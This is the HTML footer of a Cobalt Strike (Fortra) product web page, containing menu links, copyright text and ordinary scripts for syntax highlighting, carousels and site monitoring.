class="d-none widget-title">Footer Menu 5</h3><div class="menu-footer-menu-5-container"><ul id="menu-footer-menu-5" class="menu"><li id="menu-item-4447" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4447"><a href="/about">About</a> <ul class="sub-menu"> <li id="menu-item-4448" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4448"><a href="https://www.cobaltstrike.com/about/corporate-compliance-ethics">Corporate Compliance &#038; Ethics</a></li> <li id="menu-item-6154" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6154"><a href="https://www.fortra.com/about/newsroom">Newsroom</a></li> </ul> </li> </ul></div></div><!-- .footer-widget --> </div> </div> </div><!-- #wrapper-footer-full --> <div class="row copyright"> <div class="col"> <section class="row region region-footer-bottom"> <div class="content bottom-footer-links"> <div class="col"> <h3 class="d-inline-block"> <a href="https://www.fortra.com/contact-us">Contact Information</a> </h3> <h3 class="d-inline-block"> <a href="https://www.fortra.com/privacy-policy">Privacy Policy</a> </h3> <h3 class="d-inline-block"> <a href="https://www.fortra.com/cookie-policy">Cookie Policy</a> </h3> <h3 class="d-inline-block"> <a href="https://www.fortra.com/impressum">Impressum</a> </h3> Copyright &copy; Fortra, LLC and its group of companies. Fortra^&reg;, the Fortra^&reg; logos, and other identified marks are proprietary trademarks of Fortra, LLC. </div> </div> </div> </section> </div> </div> </div> </div> </div> </footer> <div class="wpc-filters-overlay"></div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="https://www.cobaltstrike.com/app/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shCore.js?ver=2.1.364" id="syntaxhighlighter-core-js"></script> <script src="https://www.cobaltstrike.com/app/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shBrushCpp.js?ver=2.1.364" id="syntaxhighlighter-brush-cpp-js"></script> <script src="https://www.cobaltstrike.com/app/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shBrushPerl.js?ver=2.1.364" id="syntaxhighlighter-brush-perl-js"></script> <script type='text/javascript'> (function(){ var corecss = document.createElement('link'); var themecss = document.createElement('link'); var corecssurl = "https://www.cobaltstrike.com/app/plugins/syntaxhighlighter/syntaxhighlighter2/styles/shCore.css?ver=2.1.364"; if ( corecss.setAttribute ) { corecss.setAttribute( "rel", "stylesheet" ); corecss.setAttribute( "type", "text/css" ); corecss.setAttribute( "href", corecssurl ); } else { corecss.rel = "stylesheet"; corecss.href = corecssurl; } document.head.appendChild( corecss ); var themecssurl = "https://www.cobaltstrike.com/app/plugins/syntaxhighlighter/syntaxhighlighter2/styles/shThemeDefault.css?ver=2.1.364"; if ( themecss.setAttribute ) { themecss.setAttribute( "rel", "stylesheet" ); themecss.setAttribute( "type", "text/css" ); themecss.setAttribute( "href", themecssurl ); } else { themecss.rel = "stylesheet"; themecss.href = themecssurl; } document.head.appendChild( themecss ); })(); SyntaxHighlighter.config.clipboardSwf = 'https://www.cobaltstrike.com/app/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/clipboard.swf'; SyntaxHighlighter.config.strings.expandSource = 'show source'; SyntaxHighlighter.config.strings.viewSource = 'view source'; SyntaxHighlighter.config.strings.copyToClipboard = 'copy to clipboard'; SyntaxHighlighter.config.strings.copyToClipboardConfirmation = 'The code is in your clipboard now'; SyntaxHighlighter.config.strings.print = 'print'; SyntaxHighlighter.config.strings.help = '?'; SyntaxHighlighter.config.strings.alert = 'SyntaxHighlighter\n\n'; SyntaxHighlighter.config.strings.noBrush = 'Can\'t find brush for: '; SyntaxHighlighter.config.strings.brushNotHtmlScript = 'Brush wasn\'t configured for html-script option: '; SyntaxHighlighter.defaults['pad-line-numbers'] = false; SyntaxHighlighter.all(); // Infinite scroll support if ( typeof( jQuery ) !== 'undefined' ) { jQuery( function( $ ) { $( document.body ).on( 'post-load', function() { SyntaxHighlighter.highlight(); } ); } ); } </script> <script src="https://www.cobaltstrike.com/app/themes/helpsystems/blocks/card-carousel/script.js?ver=6.6.2" id="card-carousel-script-js"></script> <script src="https://www.cobaltstrike.com/app/themes/helpsystems/blocks/image-carousel/script.js?ver=6.6.2" id="image-carousel-script-js"></script> <script src="https://www.cobaltstrike.com/app/themes/helpsystems/blocks/logo-carousel/script.js?ver=6.6.2" id="logo-carousel-script-js"></script> <script src="https://www.cobaltstrike.com/app/themes/helpsystems/blocks/testimonial-carousel/script.js?ver=6.6.2" id="testimonial-carousel-script-js"></script> <script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"NRJS-bd3594867243bdc7468","applicationID":"1039205502","transactionName":"ZFVVNRZUWxVSVRJcC10fdgIQXFoIHEUPWwNfVQ==","queueTime":0,"applicationTime":451,"atts":"SBJWQ15OSBs=","errorBeacon":"bam.nr-data.net","agent":""}</script></body> </html>